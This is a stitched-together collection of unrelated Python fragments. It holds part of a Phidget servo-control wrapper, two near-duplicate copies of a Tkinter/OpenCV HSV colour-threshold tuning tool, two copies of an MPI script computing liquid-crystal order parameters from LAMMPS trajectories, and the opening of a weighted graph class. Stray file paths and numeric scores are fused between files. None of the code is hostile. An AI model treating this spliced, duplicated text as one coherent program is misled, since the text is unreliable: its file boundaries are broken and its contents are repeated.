            value<double>: desired position for the motor.
        """
        self.__write("setPosition", index, c_double(value))

    def getPositionMax(self, index):
        """Returns the maximum position that a servo will accept, or return.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The maximum position in degrees <double>.
        """
        return self.__read("getPositionMax", c_double, index)

    def setPositionMax(self, index, value):
        """Sets the maximum position limit of a servo motor.

        Parameters:
            index<int>: index of the motor.
            value<double>: desired maximum position limit for the motor.
        """
        self.__write("setPositionMax", index, c_double(value))

    def getPositionMin(self, index):
        """Returns the minimum position that a servo will accept, or return.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The minimum position in degrees <double>.
        """
        return self.__read("getPositionMin", c_double, index)

    def setPositionMin(self, index, value):
        """Sets the minimum position limit of a servo motor.

        Parameters:
            index<int>: index of the motor.
            value<double>: desired minimum position limit for the motor.
        """
        self.__write("setPositionMin", index, c_double(value))

    def __nativePositionChangeEvent(self, handle, usrptr, index, value):
        # Trampoline invoked from C; forwards to the registered Python handler.
        if self.__positionChange != None:
            self.__positionChange(PositionChangeEventArgs(self, index, value))
        return 0

    def setOnPositionChangeHandler(self, positionChangeHandler):
        """Sets the Position Change Event Handler.

        The handler is called when the servo position has changed; the event
        fires after every call to setPosition.  Pass None to unregister.

        Parameters:
            positionChangeHandler: hook to the positionChangeHandler callback function.
        """
        if positionChangeHandler == None:
            self.__positionChange = None
            self.__onPositionChange = None
        else:
            self.__positionChange = positionChangeHandler
            self.__onPositionChange = self.__POSITIONCHANGEHANDLER(self.__nativePositionChangeEvent)
        try:
            result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnPositionChange_Handler(self.handle, self.__onPositionChange, None)
        except RuntimeError:
            # Roll back the registration so Python state matches the dll.
            self.__positionChange = None
            self.__onPositionChange = None
            raise
        if result > 0:
            raise PhidgetException(result)

    def getCurrent(self, index):
        """Returns a motor's current usage.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The current usage of the motor <double>.
        """
        return self.__read("getCurrent", c_double, index)

    def __nativeCurrentChangeEvent(self, handle, usrptr, index, value):
        # Trampoline invoked from C; forwards to the registered Python handler.
        if self.__currentChange != None:
            self.__currentChange(CurrentChangeEventArgs(self, index, value))
        return 0

    def setOnCurrentChangeHandler(self, currentChangeHandler):
        """Sets the CurrentChange Event Handler.

        The handler is called when the current consumed by a motor changes.
        Pass None to unregister.

        Parameters:
            currentChangeHandler: hook to the currentChangeHandler callback function.
        """
        if currentChangeHandler == None:
            self.__currentChange = None
            self.__onCurrentChange = None
        else:
            self.__currentChange = currentChangeHandler
            self.__onCurrentChange = self.__CURRENTCHANGEHANDLER(self.__nativeCurrentChangeEvent)
        try:
            result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_set_OnCurrentChange_Handler(self.handle, self.__onCurrentChange, None)
        except RuntimeError:
            # Roll back the registration so Python state matches the dll.
            self.__currentChange = None
            self.__onCurrentChange = None
            raise
        if result > 0:
            raise PhidgetException(result)

    def getSpeedRampingOn(self, index):
        """Gets the speed ramping state for a motor
        (whether or not velocity and acceleration are used).

        Parameters:
            index<int>: index of the motor.
        Returns:
            The current state of the speedRamping flag for this motor <boolean>.
        """
        return self.__read("getSpeedRampingOn", c_int, index) == 1

    def setSpeedRampingOn(self, index, state):
        """Sets the speed ramping state for a motor
        (whether or not velocity and acceleration are used).

        Parameters:
            index<int>: index of the motor.
            state<boolean>: state to set the speedRamping flag for this motor to.
        """
        self.__write("setSpeedRampingOn", index, c_int(1 if state == True else 0))

    def getEngaged(self, index):
        """Gets the engaged state of a motor (whether the motor is powered or not).

        Parameters:
            index<int>: index of the motor.
        Returns:
            The current state of the engaged flag for this motor <boolean>.
        """
        return self.__read("getEngaged", c_int, index) == 1

    def setEngaged(self, index, state):
        """Sets the engaged state of a motor (whether the motor is powered or not).

        Parameters:
            index<int>: index of the motor.
            state<boolean>: state to set the engaged flag for this motor to.
        """
        self.__write("setEngaged", index, c_int(1 if state == True else 0))

    def getStopped(self, index):
        """Gets the stopped state of a motor.

        This is true when the motor is not moving and there are no outstanding
        commands.

        Parameters:
            index<int>: index of the motor.
        Returns:
            The current state of the stopped flag for this motor <boolean>.
        """
        return self.__read("getStopped", c_int, index) == 1

    def getServoType(self, index):
        """Returns the servo type of the specified motor.

        Parameters:
            index<int>: index of a servo motor.
        Returns:
            Servo type for the motor <int>.
        """
        return self.__read("getServoType", c_int, index)

    def setServoType(self, index, servoType):
        """Sets the desired servo type for a specified motor.

        Parameters:
            index<int>: index of a servo motor.
            servoType<int>: the desired servo type for the motor.
        """
        self.__write("setServoType", index, c_int(servoType))

    def setServoParameters(self, index, minimumPulseWidth, maximumPulseWidth, degrees, velocityMax):
        """Sets custom servo parameters for using a servo not in the predefined list.

        Pulse widths are specified in microseconds.

        Parameters:
            index<int>: index of a servo motor.
            minimumPulseWidth<double>: the minimum pulse width for this servo motor type.
            maximumPulseWidth<double>: the maximum pulse width for this servo motor type.
            degrees<double>: the maximum degrees of rotation this servo motor type is capable of.
            velocityMax<double>: the maximum velocity this servo motor type is capable of.
        """
        try:
            result = PhidgetLibrary.getDll().CPhidgetAdvancedServo_setServoParameters(self.handle, c_int(index), c_double(minimumPulseWidth), c_double(maximumPulseWidth), c_double(degrees), c_double(velocityMax))
        except RuntimeError:
            raise
        if result > 0:
            raise PhidgetException(result)
import os
import json
from tkinter import *
import numpy as np
import cv2
from PIL import Image
from PIL import ImageTk
__author__ = "SumiGovindaraju"
__copyright__ = "Copyright 2018, SumiGovindaraju"
__credits__ = ["SumiGovindaraju"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "SumiGovindaraju"
__status__ = "Development"
def pipeline(img):
    """Threshold *img* (BGR) in HSV space and return the cleaned binary mask.

    Uses the global hsv_min/hsv_max bounds, closes small holes then removes
    speckle noise, and draws the detected contours onto *img* in place
    (green, thickness 3).
    """
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    thresh = cv2.inRange(hsv, hsv_min, hsv_max)
    closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)
    opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel)
    # cv2.findContours returns 2 values on OpenCV 4.x but 3 on 3.x; taking
    # the last two keeps this working on both.
    *_, contours, hierarchy = cv2.findContours(opening, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    cv2.drawContours(img, contours, -1, (0, 255, 0), 3)
    return opening
def saveHSVToFileAndClose():
    """Persist the current HSV bounds to config.json, then stop the Tk loop.

    Registered as the WM_DELETE_WINDOW handler, so this runs when the tuning
    window is closed.
    """
    jsonObj = {
        'min': {
            'hue': str(hsv_min[0]),
            'saturation': str(hsv_min[1]),
            'value': str(hsv_min[2])
        },
        'max': {
            'hue': str(hsv_max[0]),
            'saturation': str(hsv_max[1]),
            'value': str(hsv_max[2])
        }
    }
    # "with" guarantees the file is flushed and closed before the UI exits;
    # the original left the handle open.
    with open("config.json", "w") as configFile:
        configFile.write(json.dumps(jsonObj))
    root.quit()
def loadHSVFromFile(key):
    """Load one HSV bound ("min" or "max") from config.json as a uint8 triple.

    Falls back to the neutral default (90, 128, 128) when the file is missing,
    contains invalid JSON, or lacks the expected keys — the original only
    handled a missing file and crashed on a corrupt one.
    """
    try:
        with open("config.json") as json_data:
            data = json.load(json_data)
        return np.array([data[key]["hue"], data[key]["saturation"], data[key]["value"]], dtype=np.uint8)
    except (IOError, ValueError, KeyError):
        # Missing file, malformed JSON (JSONDecodeError is a ValueError), or
        # unexpected schema -> sane default.
        return np.array([90, 128, 128], dtype=np.uint8)
def addPixelHSV():
    """Widen the HSV bounds (via the sliders) so the selected pixel falls
    inside them, with a 10-unit margin per channel."""
    if selectedPixel[0] < 0 or selectedPixel[1] < 0:
        return  # nothing has been clicked yet
    hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
    clicked = hsv[selectedPixel[1], selectedPixel[0]]
    lowSliders = (app.huemin, app.satmin, app.valmin)
    highSliders = (app.huemax, app.satmax, app.valmax)
    for channel in range(3):
        component = int(clicked[channel])
        if component < hsv_min[channel]:
            lowSliders[channel].set(component - 10)
        if component > hsv_max[channel]:
            highSliders[channel].set(component + 10)
def subtractPixelHSV():
    """Tighten the HSV bounds to push the selected pixel out of range, moving
    whichever bound (min or max) is nearer on each channel."""
    if selectedPixel[0] < 0 or selectedPixel[1] < 0:
        return  # nothing has been clicked yet
    hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
    clicked = hsv[selectedPixel[1], selectedPixel[0]]
    lowSliders = (app.huemin, app.satmin, app.valmin)
    highSliders = (app.huemax, app.satmax, app.valmax)
    for channel in range(3):
        component = clicked[channel]
        # NOTE(review): arithmetic here stays uint8 exactly like the original,
        # so it can wrap around; preserved as-is.
        if abs(component - hsv_min[channel]) < abs(component - hsv_max[channel]):
            lowSliders[channel].set(component + 10)
        else:
            highSliders[channel].set(component - 10)
def selectPixel(event):
    """Mouse-click callback: remember the clicked pixel's coordinates and show
    a 50x50 swatch of its colour in an OpenCV window."""
    selectedPixel[0], selectedPixel[1] = event.x, event.y
    cv2.namedWindow("Pixel Selected")
    swatch = np.zeros((50, 50, 3), np.uint8)
    # Fill the swatch with the clicked pixel's BGR colour.
    swatch[:] = app.frame[selectedPixel[1], selectedPixel[0]]
    cv2.imshow("Pixel Selected", swatch)
# Shared tuning state: the current HSV threshold bounds (numpy uint8 triples,
# loaded from config.json or defaulted) and the last-clicked pixel
# coordinates ([-1, -1] means "no pixel selected yet").
hsv_min = loadHSVFromFile("min")
hsv_max = loadHSVFromFile("max")
selectedPixel = [-1, -1]
class TunerWindow(Frame):
    """Tk window for live-tuning the HSV threshold used by pipeline().

    Shows the camera feed (raw or masked), one slider per HSV bound, and
    buttons that grow/shrink the bounds around a clicked pixel.
    """

    def video_loop(self):
        """Sync global hsv_min/hsv_max from the sliders, grab one camera
        frame, and refresh the preview image."""
        if self.valmax.winfo_exists() == 1:
            # Pull the current slider values into the shared bounds used by pipeline().
            hsv_min[0] = self.huemin.get()
            hsv_min[1] = self.satmin.get()
            hsv_min[2] = self.valmin.get()
            hsv_max[0] = self.huemax.get()
            hsv_max[1] = self.satmax.get()
            hsv_max[2] = self.valmax.get()
            retval, self.frame = self.videocapture.read()
            if retval:
                # Only process the frame when the grab succeeded; the original
                # resized before checking retval and crashed on a None frame.
                self.frame = cv2.resize(self.frame, (0, 0), fx=0.4, fy=0.4)
                mask = pipeline(self.frame)
                cv2image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGBA) if self.showRawPhoto.get() else mask
                currentImg = Image.fromarray(cv2image)
                currentImgTK = ImageTk.PhotoImage(image=currentImg)
                # Keep a reference on the widget so Tk doesn't garbage-collect the image.
                self.imgpanel.currentImgTK = currentImgTK
                self.imgpanel.config(image=currentImgTK)

    def __init__(self, master):
        """Build the UI inside *master* (a Tk root) and open camera 0."""
        self.tk = master
        # Camera settings and such.
        # Play around with these to get a faster camera feed.
        self.videocapture = cv2.VideoCapture(0)
        self.videocapture.set(cv2.CAP_PROP_AUTOFOCUS, 0)
        # Exposure is currently restored to the camera default; substitute a
        # fixed value here (e.g. 1) if a custom exposure is needed.
        default_exposure = self.videocapture.get(cv2.CAP_PROP_EXPOSURE)
        self.videocapture.set(cv2.CAP_PROP_EXPOSURE, default_exposure)
        self.tk.title("Vision Pipeline Tuning")
        # Persist the tuned HSV values when the window is closed.
        self.tk.protocol("WM_DELETE_WINDOW", saveHSVToFileAndClose)
        self.imgpanel = Label(self.tk)
        self.imgpanel.bind("<Button-1>", selectPixel)
        self.imgpanel.pack()
        self.buttonpanel = Label(self.tk)
        self.buttonpanel.pack()
        self.showRawPhoto = IntVar()
        toggleMask = Checkbutton(self.tk, text="Toggle Mask", onvalue=False, offvalue=True, variable=self.showRawPhoto)
        toggleMask.pack(in_=self.buttonpanel, side=LEFT)
        addPixel = Button(self.tk, text="Add Pixel", command=addPixelHSV)
        addPixel.pack(in_=self.buttonpanel, side=LEFT)
        subtractPixel = Button(self.tk, text="Subtract Pixel", command=subtractPixelHSV)
        subtractPixel.pack(in_=self.buttonpanel, side=RIGHT)
        self.sliderpanel = Label(self.tk)
        self.sliderpanel.pack()
        # One labelled slider per HSV bound; hue tops out at 180 (OpenCV's hue
        # range), saturation/value at 255.
        hueminLabel = Label(self.tk, text="Hue Min:")
        hueminLabel.pack()
        self.huemin = Scale(master, from_=0, to=180, orient=HORIZONTAL)
        self.huemin.set(hsv_min[0])
        self.huemin.pack()
        huemaxLabel = Label(self.tk, text="Hue Max:")
        huemaxLabel.pack()
        self.huemax = Scale(master, from_=0, to=180, orient=HORIZONTAL)
        self.huemax.set(hsv_max[0])
        self.huemax.pack()
        satminLabel = Label(self.tk, text="Sat Min:")
        satminLabel.pack()
        self.satmin = Scale(master, from_=0, to=255, orient=HORIZONTAL)
        self.satmin.set(hsv_min[1])
        self.satmin.pack()
        satmaxLabel = Label(self.tk, text="Sat Max:")
        satmaxLabel.pack()
        self.satmax = Scale(master, from_=0, to=255, orient=HORIZONTAL)
        self.satmax.set(hsv_max[1])
        self.satmax.pack()
        valminLabel = Label(self.tk, text="Val Min:")
        valminLabel.pack()
        self.valmin = Scale(master, from_=0, to=255, orient=HORIZONTAL)
        self.valmin.set(hsv_min[2])
        self.valmin.pack()
        valmaxLabel = Label(self.tk, text="Val Max:")
        valmaxLabel.pack()
        self.valmax = Scale(master, from_=0, to=255, orient=HORIZONTAL)
        self.valmax.set(hsv_max[2])
        self.valmax.pack()
root = Tk()
app = TunerWindow(root)

if __name__ == "__main__":
    # Manual event loop instead of root.mainloop() so video_loop() can pull a
    # new camera frame between UI updates.
    try:
        while True:
            app.video_loop()
            app.update_idletasks()
            app.update()
    except TclError:
        # Raised once the window has been destroyed; exit cleanly instead of
        # crashing with a traceback.
        pass

import os
import json
from tkinter import *
import numpy as np
import cv2
from PIL import Image
from PIL import ImageTk
__author__ = "SumiGovindaraju"
__copyright__ = "Copyright 2018, SumiGovindaraju"
__credits__ = ["SumiGovindaraju"]
__license__ = "MIT"
__version__ = "1.0.0"
__maintainer__ = "SumiGovindaraju"
__status__ = "Development"
def pipeline(img):
    """Threshold *img* (BGR) in HSV space and return the cleaned binary mask.

    Uses the global hsv_min/hsv_max bounds, closes small holes then removes
    speckle noise, and draws the detected contours onto *img* in place
    (green, thickness 3).
    """
    kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))
    hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
    thresh = cv2.inRange(hsv, hsv_min, hsv_max)
    closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, kernel)
    opening = cv2.morphologyEx(closing, cv2.MORPH_OPEN, kernel)
    # cv2.findContours returns 2 values on OpenCV 4.x but 3 on 3.x; taking
    # the last two keeps this working on both.
    *_, contours, hierarchy = cv2.findContours(opening, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
    cv2.drawContours(img, contours, -1, (0, 255, 0), 3)
    return opening
def saveHSVToFileAndClose():
    """Persist the current HSV bounds to config.json, then stop the Tk loop.

    Registered as the WM_DELETE_WINDOW handler, so this runs when the tuning
    window is closed.
    """
    jsonObj = {
        'min': {
            'hue': str(hsv_min[0]),
            'saturation': str(hsv_min[1]),
            'value': str(hsv_min[2])
        },
        'max': {
            'hue': str(hsv_max[0]),
            'saturation': str(hsv_max[1]),
            'value': str(hsv_max[2])
        }
    }
    # "with" guarantees the file is flushed and closed before the UI exits;
    # the original left the handle open.
    with open("config.json", "w") as configFile:
        configFile.write(json.dumps(jsonObj))
    root.quit()
def loadHSVFromFile(key):
    """Load one HSV bound ("min" or "max") from config.json as a uint8 triple.

    Falls back to the neutral default (90, 128, 128) when the file is missing,
    contains invalid JSON, or lacks the expected keys — the original only
    handled a missing file and crashed on a corrupt one.
    """
    try:
        with open("config.json") as json_data:
            data = json.load(json_data)
        return np.array([data[key]["hue"], data[key]["saturation"], data[key]["value"]], dtype=np.uint8)
    except (IOError, ValueError, KeyError):
        # Missing file, malformed JSON (JSONDecodeError is a ValueError), or
        # unexpected schema -> sane default.
        return np.array([90, 128, 128], dtype=np.uint8)
def addPixelHSV():
    """Widen the HSV bounds (via the sliders) so the selected pixel falls
    inside them, with a 10-unit margin per channel."""
    if selectedPixel[0] < 0 or selectedPixel[1] < 0:
        return  # nothing has been clicked yet
    hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
    clicked = hsv[selectedPixel[1], selectedPixel[0]]
    lowSliders = (app.huemin, app.satmin, app.valmin)
    highSliders = (app.huemax, app.satmax, app.valmax)
    for channel in range(3):
        component = int(clicked[channel])
        if component < hsv_min[channel]:
            lowSliders[channel].set(component - 10)
        if component > hsv_max[channel]:
            highSliders[channel].set(component + 10)
def subtractPixelHSV():
    """Tighten the HSV bounds to push the selected pixel out of range, moving
    whichever bound (min or max) is nearer on each channel."""
    if selectedPixel[0] < 0 or selectedPixel[1] < 0:
        return  # nothing has been clicked yet
    hsv = cv2.cvtColor(app.frame, cv2.COLOR_BGR2HSV)
    clicked = hsv[selectedPixel[1], selectedPixel[0]]
    lowSliders = (app.huemin, app.satmin, app.valmin)
    highSliders = (app.huemax, app.satmax, app.valmax)
    for channel in range(3):
        component = clicked[channel]
        # NOTE(review): arithmetic here stays uint8 exactly like the original,
        # so it can wrap around; preserved as-is.
        if abs(component - hsv_min[channel]) < abs(component - hsv_max[channel]):
            lowSliders[channel].set(component + 10)
        else:
            highSliders[channel].set(component - 10)
def selectPixel(event):
    """Mouse-click callback: remember the clicked pixel's coordinates and show
    a 50x50 swatch of its colour in an OpenCV window."""
    selectedPixel[0], selectedPixel[1] = event.x, event.y
    cv2.namedWindow("Pixel Selected")
    swatch = np.zeros((50, 50, 3), np.uint8)
    # Fill the swatch with the clicked pixel's BGR colour.
    swatch[:] = app.frame[selectedPixel[1], selectedPixel[0]]
    cv2.imshow("Pixel Selected", swatch)
# Shared tuning state: the current HSV threshold bounds (numpy uint8 triples,
# loaded from config.json or defaulted) and the last-clicked pixel
# coordinates ([-1, -1] means "no pixel selected yet").
hsv_min = loadHSVFromFile("min")
hsv_max = loadHSVFromFile("max")
selectedPixel = [-1, -1]
class TunerWindow(Frame):
    """Tk window for interactively tuning the HSV threshold pipeline.

    Shows the live camera feed (raw or masked), one slider per HSV bound,
    and buttons that widen/narrow the bounds around a clicked pixel.
    Reads and mutates the module-level hsv_min / hsv_max lists.
    """

    def video_loop(self):
        """Process one camera frame: sync sliders into the bounds, grab, mask, display."""
        if self.valmax.winfo_exists() == 1:
            # Push the current slider positions into the shared HSV bounds.
            hsv_min[0] = self.huemin.get()
            hsv_min[1] = self.satmin.get()
            hsv_min[2] = self.valmin.get()
            hsv_max[0] = self.huemax.get()
            hsv_max[1] = self.satmax.get()
            hsv_max[2] = self.valmax.get()
            retval, frame = self.videocapture.read()
            # Only touch the frame when the capture succeeded; the original
            # resized and ran the pipeline before checking retval, which
            # crashes on a dropped frame (frame is None).
            if retval:
                self.frame = cv2.resize(frame, (0, 0), fx=0.4, fy=0.4)
                mask = pipeline(self.frame)
                cv2image = cv2.cvtColor(self.frame, cv2.COLOR_BGR2RGBA) if self.showRawPhoto.get() else mask
                currentImg = Image.fromarray(cv2image)
                currentImgTK = ImageTk.PhotoImage(image=currentImg)
                # Keep a reference on the widget so Tk does not garbage-collect
                # the PhotoImage while it is displayed.
                self.imgpanel.currentImgTK = currentImgTK
                self.imgpanel.config(image=currentImgTK)

    def _add_slider(self, text, maximum, initial):
        """Create a labelled horizontal 0..maximum slider on the window and return it."""
        Label(self.tk, text=text).pack()
        slider = Scale(self.tk, from_=0, to=maximum, orient=HORIZONTAL)
        slider.set(initial)
        slider.pack()
        return slider

    def __init__(self, master):
        """Build the tuner UI on top of *master* (a Tk root window)."""
        # NOTE(review): Frame.__init__ is intentionally not called here, as in
        # the original; widgets are created directly on the master window.
        self.tk = master
        # Camera settings: disable autofocus and pin the exposure so the HSV
        # values stay stable while tuning. (Exposure is re-set to its current
        # value as an explicit hook for choosing a custom one.)
        self.videocapture = cv2.VideoCapture(0)
        self.videocapture.set(cv2.CAP_PROP_AUTOFOCUS, 0)
        default_exposure = self.videocapture.get(cv2.CAP_PROP_EXPOSURE)
        self.videocapture.set(cv2.CAP_PROP_EXPOSURE, default_exposure)
        self.tk.title("Vision Pipeline Tuning")
        # Persist the tuned bounds when the window is closed.
        self.tk.protocol("WM_DELETE_WINDOW", saveHSVToFileAndClose)
        # Live image panel; clicking it selects a pixel for add/subtract.
        self.imgpanel = Label(self.tk)
        self.imgpanel.bind("<Button-1>", selectPixel)
        self.imgpanel.pack()
        self.buttonpanel = Label(self.tk)
        self.buttonpanel.pack()
        # showRawPhoto toggles between the raw feed and the pipeline mask.
        self.showRawPhoto = IntVar()
        toggleMask = Checkbutton(self.tk, text="Toggle Mask", onvalue=False, offvalue=True, variable=self.showRawPhoto)
        toggleMask.pack(in_=self.buttonpanel, side=LEFT)
        addPixel = Button(self.tk, text="Add Pixel", command=addPixelHSV)
        addPixel.pack(in_=self.buttonpanel, side=LEFT)
        subtractPixel = Button(self.tk, text="Subtract Pixel", command=subtractPixelHSV)
        subtractPixel.pack(in_=self.buttonpanel, side=RIGHT)
        self.sliderpanel = Label(self.tk)
        self.sliderpanel.pack()
        # One slider per HSV bound. Hue is 0..180 in OpenCV; S and V are 0..255.
        self.huemin = self._add_slider("Hue Min:", 180, hsv_min[0])
        self.huemax = self._add_slider("Hue Max:", 180, hsv_max[0])
        self.satmin = self._add_slider("Sat Min:", 255, hsv_min[1])
        self.satmax = self._add_slider("Sat Max:", 255, hsv_max[1])
        self.valmin = self._add_slider("Val Min:", 255, hsv_min[2])
        self.valmax = self._add_slider("Val Max:", 255, hsv_max[2])
# Build the Tk root window and the tuner application on top of it.
root = Tk()
app = TunerWindow(root)
if __name__ == "__main__":
    # Manual event loop instead of root.mainloop(): interleave one frame of
    # camera processing with one round of Tk event handling per iteration.
    # (Extraction residue "| 0.401805 | 0.12544 |" removed from the last
    # statement — it made app.update() a TypeError at runtime.)
    while True:
        app.video_loop()
        app.update_idletasks()
        app.update()
import numpy as np
from glob import glob
from mpi4py import MPI
from nematic_sma_OP import PO
# MPI process identity: this process's rank and the total process count.
rank = MPI.COMM_WORLD.Get_rank()
nprocs = MPI.COMM_WORLD.Get_size()
# Frame window to analyse, as Python slice indices into the chronologically
# sorted dump list: the last 2500 frames, excluding the very last one
# (the slice [first_frame:last_frame] with last_frame=-1 drops the final frame).
first_frame = -2500
last_frame = -1
def open_trajectory(nprocs, rank, first_frame, last_frame, wrap=False, visualize=False, ini_layer_spacing=27.,
                    gb_type=3, gb_ends_type=2, atoms_per_monomer=13, number_of_monomer=1440, number_of_chains=144):
    """
    This function will open a LAMMPS trajectory in parallel to calculate the SmA and nematic order parameters.
    Each frame is considered independent, and the final results are transmitted to the processor with rank=0,
    which sorts them by timestep and writes the output files.
    Args:
    ----
    nprocs(int): number of processors (read from mpirun command)
    rank(int): rank of the process
    first_frame(int): the first frame of the trajectory
    last_frame(int): the last frame of the trajectory
    wrap(bool): True if the coordinates are to be wrapped
    visualize(bool): True if the gz12 in function of z12 graph for the SmA OP is desired (3X slower)
    ini_layer_spacing(float): SmA layer spacing to optimize
    gb_type(int): atom type of the ellipsoid
    gb_ends_type(int): atom type of the pseudo-atoms at the end of the ellipsoids
    atoms_per_monomer(int): atoms per monomer in the chains
    number_of_monomer(int): total number of monomers in the system
    number_of_chains(int): number of polymer chains in the system
    Returns:
    ----
    nematic_OP.out(text file): a file with the timestep and the calculated nematic OP
    sma_OP.out(text file): a file with the timestep, the SmA OP and the optimized layer spacing
    """
    # Collect every dump file in the working directory.
    complete_trajectory = glob("*dump*")
    # Sort chronologically by the integer embedded in the file name.
    # FIX: the original used int(filter(str.isdigit, f)), which only works on
    # Python 2 — on Python 3 filter() returns an iterator, so the digits must
    # be joined back into a string before conversion.
    complete_trajectory.sort(key=lambda f: int("".join(filter(str.isdigit, f))))
    # Keep only the requested frame window.
    desired_trajectory = complete_trajectory[first_frame:last_frame]
    # Split the frames into one contiguous chunk per MPI rank.
    fragment_trajectory = np.array_split(desired_trajectory, nprocs)
    # FIX: accumulators are created once, before the loop. The original
    # re-created them inside an np.nditer loop over the rank's chunk, which
    # would silently discard earlier results if the iterator yielded more
    # than one sub-chunk.
    steps_nematic_OP = []
    steps_sma_OP_distance = []
    for dump in fragment_trajectory[rank]:
        po = PO(dump, wrap, visualize, ini_layer_spacing, gb_type, gb_ends_type,
                atoms_per_monomer, number_of_monomer, number_of_chains)
        # nematic order parameter
        step, nematic_OP, director = po.nematic()
        steps_nematic_OP.append([step, nematic_OP])
        # SmA order parameter and optimized layer spacing
        step, sma_OP, distance = po.sma()
        steps_sma_OP_distance.append([step, sma_OP, distance])
    print("Rank: ", rank, " has finished")
    MPI.COMM_WORLD.barrier()
    # The processor with rank=0 gathers the per-rank results.
    steps_nematic_OP = MPI.COMM_WORLD.gather(steps_nematic_OP, root=0)
    MPI.COMM_WORLD.barrier()
    steps_sma_OP_distance = MPI.COMM_WORLD.gather(
        steps_sma_OP_distance, root=0)
    MPI.COMM_WORLD.barrier()
    # rank=0 sorts everything by timestep and writes the output files.
    if rank == 0:
        steps_nematic_OP = np.concatenate(steps_nematic_OP)
        steps_nematic_OP = steps_nematic_OP[steps_nematic_OP[:, 0].argsort()]
        np.savetxt('nematic_OP.out', steps_nematic_OP)
        steps_sma_OP_distance = np.concatenate(steps_sma_OP_distance)
        steps_sma_OP_distance = steps_sma_OP_distance[
            steps_sma_OP_distance[:, 0].argsort()]
        np.savetxt('sma_OP.out', steps_sma_OP_distance)
open_trajectory(nprocs, rank, first_frame, last_frame) | dataAnalysis/op_traj_mpi.py | import numpy as np
from glob import glob
from mpi4py import MPI
from nematic_sma_OP import PO
# MPI process identity: this process's rank and the total process count.
rank = MPI.COMM_WORLD.Get_rank()
nprocs = MPI.COMM_WORLD.Get_size()
# Frame window to analyse, as Python slice indices into the chronologically
# sorted dump list: the last 2500 frames, excluding the very last one.
first_frame = -2500
last_frame = -1
def open_trajectory(nprocs, rank, first_frame, last_frame, wrap=False, visualize=False, ini_layer_spacing=27.,
                    gb_type=3, gb_ends_type=2, atoms_per_monomer=13, number_of_monomer=1440, number_of_chains=144):
    """
    This function will open a LAMMPS trajectory in parallel to calculate the SmA and nematic order parameters.
    Each frame is considered independent, and the final results are transmitted to the processor with rank=0,
    which sorts them by timestep and writes the output files.
    Args:
    ----
    nprocs(int): number of processors (read from mpirun command)
    rank(int): rank of the process
    first_frame(int): the first frame of the trajectory
    last_frame(int): the last frame of the trajectory
    wrap(bool): True if the coordinates are to be wrapped
    visualize(bool): True if the gz12 in function of z12 graph for the SmA OP is desired (3X slower)
    ini_layer_spacing(float): SmA layer spacing to optimize
    gb_type(int): atom type of the ellipsoid
    gb_ends_type(int): atom type of the pseudo-atoms at the end of the ellipsoids
    atoms_per_monomer(int): atoms per monomer in the chains
    number_of_monomer(int): total number of monomers in the system
    number_of_chains(int): number of polymer chains in the system
    Returns:
    ----
    nematic_OP.out(text file): a file with the timestep and the calculated nematic OP
    sma_OP.out(text file): a file with the timestep, the SmA OP and the optimized layer spacing
    """
    # Collect every dump file in the working directory.
    complete_trajectory = glob("*dump*")
    # Sort chronologically by the integer embedded in the file name.
    # FIX: the original used int(filter(str.isdigit, f)), which only works on
    # Python 2 — on Python 3 filter() returns an iterator, so the digits must
    # be joined back into a string before conversion.
    complete_trajectory.sort(key=lambda f: int("".join(filter(str.isdigit, f))))
    # Keep only the requested frame window.
    desired_trajectory = complete_trajectory[first_frame:last_frame]
    # Split the frames into one contiguous chunk per MPI rank.
    fragment_trajectory = np.array_split(desired_trajectory, nprocs)
    # FIX: accumulators are created once, before the loop. The original
    # re-created them inside an np.nditer loop over the rank's chunk, which
    # would silently discard earlier results if the iterator yielded more
    # than one sub-chunk.
    steps_nematic_OP = []
    steps_sma_OP_distance = []
    for dump in fragment_trajectory[rank]:
        po = PO(dump, wrap, visualize, ini_layer_spacing, gb_type, gb_ends_type,
                atoms_per_monomer, number_of_monomer, number_of_chains)
        # nematic order parameter
        step, nematic_OP, director = po.nematic()
        steps_nematic_OP.append([step, nematic_OP])
        # SmA order parameter and optimized layer spacing
        step, sma_OP, distance = po.sma()
        steps_sma_OP_distance.append([step, sma_OP, distance])
    print("Rank: ", rank, " has finished")
    MPI.COMM_WORLD.barrier()
    # The processor with rank=0 gathers the per-rank results.
    steps_nematic_OP = MPI.COMM_WORLD.gather(steps_nematic_OP, root=0)
    MPI.COMM_WORLD.barrier()
    steps_sma_OP_distance = MPI.COMM_WORLD.gather(
        steps_sma_OP_distance, root=0)
    MPI.COMM_WORLD.barrier()
    # rank=0 sorts everything by timestep and writes the output files.
    if rank == 0:
        steps_nematic_OP = np.concatenate(steps_nematic_OP)
        steps_nematic_OP = steps_nematic_OP[steps_nematic_OP[:, 0].argsort()]
        np.savetxt('nematic_OP.out', steps_nematic_OP)
        steps_sma_OP_distance = np.concatenate(steps_sma_OP_distance)
        steps_sma_OP_distance = steps_sma_OP_distance[
            steps_sma_OP_distance[:, 0].argsort()]
        np.savetxt('sma_OP.out', steps_sma_OP_distance)
open_trajectory(nprocs, rank, first_frame, last_frame) | 0.788909 | 0.468851 |
import copy
class WeightedUndirectedGraph(object):
    '''
    An object that records a weighted undirected graph.
    Members
    -------
    WeightedUndirectedGraph._graph: dict of dict, adjacency map node -> {neighbour: weight};
    WeightedUndirectedGraph._degree: the precomputed weighted degree of each node in the graph;
    WeightedUndirectedGraph._node_weight: the weight of each node in the graph;
